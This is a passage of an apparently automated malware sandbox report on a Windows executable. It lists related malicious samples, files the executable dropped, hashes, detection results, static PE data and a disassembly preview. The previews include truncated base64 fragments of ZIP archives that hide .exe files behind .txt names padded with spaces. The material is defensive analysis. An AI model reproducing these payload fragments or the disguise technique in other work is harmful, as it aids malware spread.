	file.exe	Get hash	malicious	Unknown	Browse	20.90.152.133 20.90.156.32
	P.O# 21-1477 - POT and Plunger.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	metalwork_orden_0214.pdf.vbs	Get hash	malicious	Azorult	Browse	20.90.152.133 20.90.156.32
	metalwork_orden_0214.pdf.vbs	Get hash	malicious	Azorult	Browse	20.90.152.133 20.90.156.32
	OtDwNwrHgf.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32
	AMWv8x2ySF.exe	Get hash	malicious	AgentTesla	Browse	20.90.152.133 20.90.156.32

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\Jammer2nd.exe

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22017
Entropy (8bit):	7.51484179676687
Encrypted:	false
SSDEEP:	384:EXU9ccc7UJPckKSB+Ir//avobyWblunkd1SHVbonWNDiRHfJb9JR:h9ZclSB+IDaoLluI1SHuWQfxDR
MD5:	A3B23357F518A7B2F8180585D512DF94
SHA1:	07926A2239463879FDA1D3BB071BC37F3715072B
SHA-256:	77914ECC60F5BEA2153E6C6D8A148742902AF5C160EB01EE2E92ACA05802A225
SHA-512:	F9D403BD4B2DD104694A81ECCF2284E6DE17C57AEAA53808694AC6D7C0C529BA1FCA1E9E31F57EB6B6601D8C2E1953B86E9BE67E1E59D6C674D5046F72C33C38
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P0.h>c.h>c.h>c_t0c.h>c4w4c.h>c_`cc.h>c.h>c.h>c.h?c.h>c.w-c.h>c4w5c.h>cdn8c.h>cRich.h>c........................PE..L....[.@.................R...(......_>.......p....@..................................................................................................................................................................................................text............D......2CEP........ ....rsrc................H.............. ....mjg.................V...L..\|.e.....@..@.........................................rsrc............................... ...........................................................................................................................................................................................................................................................................................................................

C:\Windows\Jammer2nd.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\pk_zip1.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30716
Entropy (8bit):	5.791824400052486
Encrypted:	false
SSDEEP:	768:xIRb/Da5H2iojsx84B/tNmPCzr1C8jOyWbgiNkY+/FG:xI9bRDjsa43NJzrX/FG
MD5:	18C9F7D2F634188D27B5FEAB03240237
SHA1:	2EFC7ACC07A3B6ACE4122404F2524965A9A28D3A
SHA-256:	CC31F96DD5720DA8F2CDFF38770AF1B038004EE0B278AC7B78E0F131653085F4
SHA-512:	06F390C161A66F75AFE0A78708CFCC79D6127A577E13A9B48A115E7C2B7521324949E0C825FF3B0B510526B7BA722C9E971B78FBA1F918296404880300038E8C
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAEuOVDCd/KGTAVYAAAFWAACUAAAARGV0YWlscy50eHQgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgLmV4ZU1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAPAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBj..YW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAmAlQMNxoPmPcaD5j3Gg+Y190..MGPQaD5jNHc0Y8VoPmNfYGNj3mg+Y9xoPmPfaD5j3Gg/Y75oPmO+dy1j1Wg+YzR3NWPZaD5j..ZG44Y91oPmNSaWNo3Gg+YwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMADVuFQAAA..AAAAAAAA4AAPAQsBBgAAUgAAACgcAAAAAABfPgAAABAAAABwAAAAAEAAABAAAAACAAAEAAAA..AAAAAAQAAAAAAAAAAcAdAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAA..AAAAAAAAHrUcAIoAAAAAsBwACgUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAAoBwAABAAAABEAAAABAAAMkNFUAAAAAAAAAAA..IAAA4C5yc3JjAAAAGAUBAACwHAAADgAAAEgAAA

C:\Windows\pk_zip2.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30710
Entropy (8bit):	5.794610847569551
Encrypted:	false
SSDEEP:	384:IQQU2CO/FrTP2gh4BOKMR81B6Rt6tNjHpUddSuj43tDguze1N+TsrNv+DJ/atB/M:IQXO/Fr14BOs1s6jj6ddnjmzw89ytQf
MD5:	9B27D0ADD03C44BAFBBD296871F9ABC1
SHA1:	F86567C597ABA72F0483EE4B256D9260BDCFE9AD
SHA-256:	36A2CC9E01438E6E5A275FEB32C8FD0DA06340E7388B2D1116F3A84B627C544B
SHA-512:	52239A0C3253FCA5C132FCB222CD908FA8558A5239579EB9B7A9B280A6D48C407CC2475E8A45FB8024779602E1CA14EBBB55C7DFA9EF45DE3A7E6A437173DA9C
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAEyOVDCd/KGTAVYAAAFWAACTAAAATm90aWNlLnR4dCAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAuZXhlTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNh..bm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACYCVAw3Gg+Y9xoPmPcaD5jX3Qw..Y9BoPmM0dzRjxWg+Y19gY2PeaD5j3Gg+Y99oPmPcaD9jvmg+Y753LWPVaD5jNHc1Y9loPmNk..bjhj3Wg+Y1JpY2jcaD5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwANW4VAAAAA..AAAAAADgAA8BCwEGAABSAAAAKBwAAAAAAF8+AAAAEAAAAHAAAAAAQAAAEAAAAAIAAAQAAAAA..AAAABAAAAAAAAAABwB0AAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAA..AAAAAAAetRwAigAAAACwHAAKBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAACgHAAAEAAAAEQAAAAEAAAyQ0VQAAAAAAAAAAAg..AADgLnJzcmMAAAAYBQEAALAcAAAOAAAASAAAAA

C:\Windows\pk_zip3.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30720
Entropy (8bit):	5.794692358685616
Encrypted:	false
SSDEEP:	384:A0wqJGS8BnLrmwb6QRc5Riijpt5UoFEIW/NCCoyTwNXhFexObCFtGTQndfaTrVrI:A0rj8BnTg5Eij/5sJ/NzDKCkbg0nV0oO
MD5:	8AB2B80E73C3B36FCF8A6C0F7B457513
SHA1:	47209A59EF0CF07F8B61FADCFBC28D35C0E69EFD
SHA-256:	47AF0C94E5264D6C77630DDE1F0CE5F005473E57EC034CA037328376E3D97224
SHA-512:	79001C5AE7871F8CD3B4B3A35012E70E8FFF7DDA29F9BADD1903A848F33E9B3E9E02B1327059E894F63F2D38E9FAF218477DC71C707D1FB306D03A82F16AD29A
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAE6OVDCd/KGTAVYAAAFWAACWAAAASW1wb3J0YW50LnR4dCAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAuZXhlTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt..IGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACYCVAw3Gg+Y9xoPmPcaD5j..X3QwY9BoPmM0dzRjxWg+Y19gY2PeaD5j3Gg+Y99oPmPcaD9jvmg+Y753LWPVaD5jNHc1Y9lo..PmNkbjhj3Wg+Y1JpY2jcaD5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwANW4VA..AAAAAAAAAADgAA8BCwEGAABSAAAAKBwAAAAAAF8+AAAAEAAAAHAAAAAAQAAAEAAAAAIAAAQA..AAAAAAAABAAAAAAAAAABwB0AAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA..AAAAAAAAAAAetRwAigAAAACwHAAKBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAACgHAAAEAAAAEQAAAAEAAAyQ0VQAAAAAAAA..AAAgAADgLnJzcmMAAAAYBQEAALAcAAAOAAAASA

C:\Windows\pk_zip4.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	30706
Entropy (8bit):	5.791684865757618
Encrypted:	false
SSDEEP:	768:dBb6KExWWMPQ1QYRLJ5y/a3DpSkrSbbeuvwcZZkUmAkq:d1zBrPQCYH5V3D4bMtq
MD5:	99835A76CF47D4DE6E7C4D6B77FF573F
SHA1:	C035358403386D0EDFB394C4D84DDBE77571CA89
SHA-256:	682DF9D187DCCBC5B0BA563783CAF97C3E0642C8027DE6AC6B4CB991B3E375F5
SHA-512:	FC3F82785518A5BD682EA22742F1FCE1C852B475581298D4E09BB324941BFBAC7E876DA435F4B302C3C295C7014B6F3C75FE2ACD2E9D8293F7839804CEFB5FEA
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAE+OVDCd/KGTAVYAAAFWAACRAAAAQmlsbC50eHQgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgLmV4ZU1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAPAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5u..b3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAmAlQMNxoPmPcaD5j3Gg+Y190MGPQ..aD5jNHc0Y8VoPmNfYGNj3mg+Y9xoPmPfaD5j3Gg/Y75oPmO+dy1j1Wg+YzR3NWPZaD5jZG44..Y91oPmNSaWNo3Gg+YwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMADVuFQAAAAAAA..AAAA4AAPAQsBBgAAUgAAACgcAAAAAABfPgAAABAAAABwAAAAAEAAABAAAAACAAAEAAAAAAAA..AAQAAAAAAAAAAcAdAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAA..AAAAHrUcAIoAAAAAsBwACgUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAALnRleHQAAAAAoBwAABAAAABEAAAABAAAMkNFUAAAAAAAAAAAIAAA..4C5yc3JjAAAAGAUBAACwHAAADgAAAEgAAAAAAA

C:\Windows\pk_zip5.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30706
Entropy (8bit):	5.7916638761009605
Encrypted:	false
SSDEEP:	768:YBb6KExWWMPQ1QYRLJ5y/a3DpSkrSbbeuvwcZZkUmAkW:Y1zBrPQCYH5V3D4bMtW
MD5:	52906328526BE7DDECDC32B233A46472
SHA1:	D34B38E4B97A4E55B82FD4495E29602C5D3B066F
SHA-256:	1FE78EB7D294D4F011E80D255C4ADFCC497E6AA36F8A2502368596F6590E823D
SHA-512:	6BC44C01D622CC6BAEBED96A7618902DD4A8F95F2D586F2FB1D38969FCAC4C5118D5BD2D2E773FB78F711F6D9A86BB5B949813BA53DC40AFC787B4EDE0A7797E
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAE+OVDCd/KGTAVYAAAFWAACRAAAARGF0YS50eHQgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgLmV4ZU1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAPAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5u..b3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAmAlQMNxoPmPcaD5j3Gg+Y190MGPQ..aD5jNHc0Y8VoPmNfYGNj3mg+Y9xoPmPfaD5j3Gg/Y75oPmO+dy1j1Wg+YzR3NWPZaD5jZG44..Y91oPmNSaWNo3Gg+YwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMADVuFQAAAAAAA..AAAA4AAPAQsBBgAAUgAAACgcAAAAAABfPgAAABAAAABwAAAAAEAAABAAAAACAAAEAAAAAAAA..AAQAAAAAAAAAAcAdAAAEAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAA..AAAAHrUcAIoAAAAAsBwACgUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAALnRleHQAAAAAoBwAABAAAABEAAAABAAAMkNFUAAAAAAAAAAAIAAA..4C5yc3JjAAAAGAUBAACwHAAADgAAAEgAAAAAAA

C:\Windows\pk_zip6.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30710
Entropy (8bit):	5.794424511850545
Encrypted:	false
SSDEEP:	384:wQQU2CO/FrTP2gh4BOKMR81B6Rt6tNjHpUddSuj43tDguze1N+TsrNv+DJ/atB/J:wQXO/Fr14BOs1s6jj6ddnjmzw89ytQ+
MD5:	F4CBD8078D36FE82C59199D810B057A2
SHA1:	AC6519B1243983CD0DD5DFD079BA8D9A46118D8A
SHA-256:	989940AE8DAE9C7174906043ADDAF1FA8F19515F289B98250253A3EF93F3F968
SHA-512:	A6CE6957845099351B6C3F057CD6B49C68FC475F2D08A7BD766A98D050EFCD40DB5BEE8FCF55E53AFCFF4F40DF364AA706937527A1A8725FDB2D27540E55AF4D
Malicious:	false
Reputation:	low
Preview:	UEsDBAoAAAAAAFCOVDCd/KGTAVYAAAFWAACTAAAAUGFydC0yLnR4dCAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAuZXhlTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNh..bm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACYCVAw3Gg+Y9xoPmPcaD5jX3Qw..Y9BoPmM0dzRjxWg+Y19gY2PeaD5j3Gg+Y99oPmPcaD9jvmg+Y753LWPVaD5jNHc1Y9loPmNk..bjhj3Wg+Y1JpY2jcaD5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwANW4VAAAAA..AAAAAADgAA8BCwEGAABSAAAAKBwAAAAAAF8+AAAAEAAAAHAAAAAAQAAAEAAAAAIAAAQAAAAA..AAAABAAAAAAAAAABwB0AAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAA..AAAAAAAetRwAigAAAACwHAAKBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAACgHAAAEAAAAEQAAAAEAAAyQ0VQAAAAAAAAAAAg..AADgLnJzcmMAAAAYBQEAALAcAAAOAAAASAAAAA

C:\Windows\pk_zip7.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30716
Entropy (8bit):	5.794680104017122
Encrypted:	false
SSDEEP:	768:9tuy6eD2Ld6leUr6vIPDBqXvl7TWMKoOuAP71v:9VGZ6lgvIPDBElfJ+P79
MD5:	9E4466859BF8002FEAE8E240897EFCD5
SHA1:	F70C230C918D2FFFA5D66EA6A96BD78975E2947F
SHA-256:	622847F41BA60056CD789CE3A9DA8C7510C0C6685A024E502C312610C9242B56
SHA-512:	7C91DEF6440A6F7E0D5D064A8F4E5D90639F5EFC01AC0490C34653125D20FC3C1788E79D2FA46E3D419A44C807263814A55D64FCE9B0888AE987D401DE02E5FE
Malicious:	false
Preview:	UEsDBAoAAAAAAFCOVDCd/KGTAVYAAAFWAACVAAAAVGV4dGZpbGUudHh0ICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgIC5leGVNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0g..Y2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAJgJUDDcaD5j3Gg+Y9xoPmNf..dDBj0Gg+YzR3NGPFaD5jX2BjY95oPmPcaD5j32g+Y9xoP2O+aD5jvnctY9VoPmM0dzVj2Wg+..Y2RuOGPdaD5jUmljaNxoPmMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDAA1bhUAA..AAAAAAAAAOAADwELAQYAAFIAAAAoHAAAAAAAXz4AAAAQAAAAcAAAAABAAAAQAAAAAgAABAAA..AAAAAAAEAAAAAAAAAAHAHQAABAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAA..AAAAAAAAAB61HACKAAAAALAcAAoFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAAKAcAAAQAAAARAAAAAQAADJDRVAAAAAAAAAA..ACAAAOAucnNyYwAAABgFAQAAsBwAAA4AAABIAA

C:\Windows\pk_zip8.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30728
Entropy (8bit):	5.794952984774921
Encrypted:	false
SSDEEP:	768:cELQZrDjwN0SbMpp9Jvv+TSs7YEwoB0BSw:cGQZrDjYrAGTSHEwAw
MD5:	83685D1F3F0E38F0578FF1FB9BE3459F
SHA1:	40DFD91317C83FA92682A150500906C5CA340882
SHA-256:	2D74D576C639D81E86FD91FBF15898D5089B3608CB9F03B95B42861BD2ABB31E
SHA-512:	E11FEF68F8BA81CC7CB2F155B1B39E5987680E3DA9FADA37C2D72C90037FC72D2AAF0B323693F0F695C56661068CF17CA41FAF5375C123EDD72646DD7D2D8A72
Malicious:	false
Preview:	UEsDBAoAAAAAAFCOVDCd/KGTAVYAAAFWAACZAAAASW5mb3JtYXRpb25zLnR4dCAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg..ICAgICAgICAgICAgICAgICAuZXhlTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9n..cmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACYCVAw3Gg+Y9xoPmPc..aD5jX3QwY9BoPmM0dzRjxWg+Y19gY2PeaD5j3Gg+Y99oPmPcaD9jvmg+Y753LWPVaD5jNHc1..Y9loPmNkbjhj3Wg+Y1JpY2jcaD5jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwAN..W4VAAAAAAAAAAADgAA8BCwEGAABSAAAAKBwAAAAAAF8+AAAAEAAAAHAAAAAAQAAAEAAAAAIA..AAQAAAAAAAAABAAAAAAAAAABwB0AAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQ..AAAAAAAAAAAAAAAetRwAigAAAACwHAAKBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAACgHAAAEAAAAEQAAAAEAAAyQ0VQAAAA..AAAAAAAgAADgLnJzcmMAAAAYBQEAALAcAAAOAA

C:\Windows\pk_zip_alg.log

Download File

Process:	C:\Users\user\Desktop\ .exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	22421
Entropy (8bit):	7.495902355790524
Encrypted:	false
SSDEEP:	384:dXU9ccc7UJPckKSB+Ir//avobyWblunkd1SHVbonWNDiRHfJb9Jz:q9ZclSB+IDaoLluI1SHuWQfxDz
MD5:	65C95BDF0B82AEA51A99DAEAFBA7E1FA
SHA1:	D0A178711E2DA4D75FDC09F614F986ED1E9CE064
SHA-256:	BAD17EF9E8DBBB38225E7D8020F7F070273DFCFC88A8D203F2957DB39EA455AA
SHA-512:	1E3EB3E8BD72F9E4C89BC1882390D295F8E856816C6702C5416E25686C9DD3CB332080720A194AA1ABDD9415E845BDB7280B45FD887CE8727A26BA4FBC6B9406
Malicious:	false
Preview:	PK........P.T0.....V...V......Informations.txt .exeMZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P0.h>c.h>c.h>c_t0c.h>c4w4c.h>c_`cc.h>c.h>c.h>c.h?c.h>c.w-c.h>c4w5c.h>cdn8c.h>cRich.h>c........................PE..L....[.@.................R...(......_>.......p....@..................................................................................................................................................................................................text............D......2CEP........ ....rsrc................H.............. ....mjg.................V...L..\|.e.....@..@.........................................rsrc............................... ....................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.51484179676687
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	.exe
File size:	22017
MD5:	a3b23357f518a7b2f8180585d512df94
SHA1:	07926a2239463879fda1d3bb071bc37f3715072b
SHA256:	77914ecc60f5bea2153e6c6d8a148742902af5c160eb01ee2e92aca05802a225
SHA512:	f9d403bd4b2dd104694a81eccf2284e6de17c57aeaa53808694ac6d7c0c529ba1fca1e9e31f57eb6b6601d8c2e1953b86e9be67e1e59d6c674d5046f72c33c38
SSDEEP:	384:EXU9ccc7UJPckKSB+Ir//avobyWblunkd1SHVbonWNDiRHfJb9JR:h9ZclSB+IDaoLluI1SHuWQfxDR
TLSH:	9EA2C0827717ECB2C2681A723583CBB841D26F9C1F50E25777AE7A1D39F961C3880649
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........P0.h>c.h>c.h>c_t0c.h>c4w4c.h>c_`cc.h>c.h>c.h>c.h?c.h>c.w-c.h>c4w5c.h>cdn8c.h>cRich.h>c........................PE..L....[.@...

File Icon


Icon Hash:	e8e4e4cce4e4f404

Static PE Info

General

Entrypoint:	0x403e5f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x40855B0D [Tue Apr 20 17:17:01 2004 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	09d0478591d4f788cb3e5ea416c25237

Entrypoint Preview

Instruction
mov eax, 00403E6Eh
add byte ptr [eax], 00000028h
inc eax
add dword ptr [eax], 01234567h
nop
retf
jbe 00007F1C14DA845Bh
call dword ptr [eax+64h]
push dword ptr [00000000h]
mov dword ptr fs:[00000000h], esp
xor eax, eax
mov dword ptr [eax], ecx
nop
nop
nop
nop
xor eax, 3A127605h
add al, 08h
push ds
adc dword ptr [esp+ecx*2], eax
push edi
insb
stosb
retf
hlt
insb
in eax, AAh
cmc
mov ah, B2h
pop ss
mov dword ptr [DCB7C5D3h], eax
ret
xchg eax, esp
pop edi
insb
adc byte ptr [edx+esi*2], 00000005h
sub ecx, ecx
js 00007F1C14DA8421h
mov ah, E7h
fimul word ptr [edx]
jnp 00007F1C14DA8438h
mov edi, dword ptr [884187BEh]
test byte ptr [82C3EB40h], al
add dh, al
jc 00007F1C14DA8416h
mov al, byte ptr [ebp-0Eh]
push eax

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[C++] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cb51e	0x8a	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1cb000	0x50a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
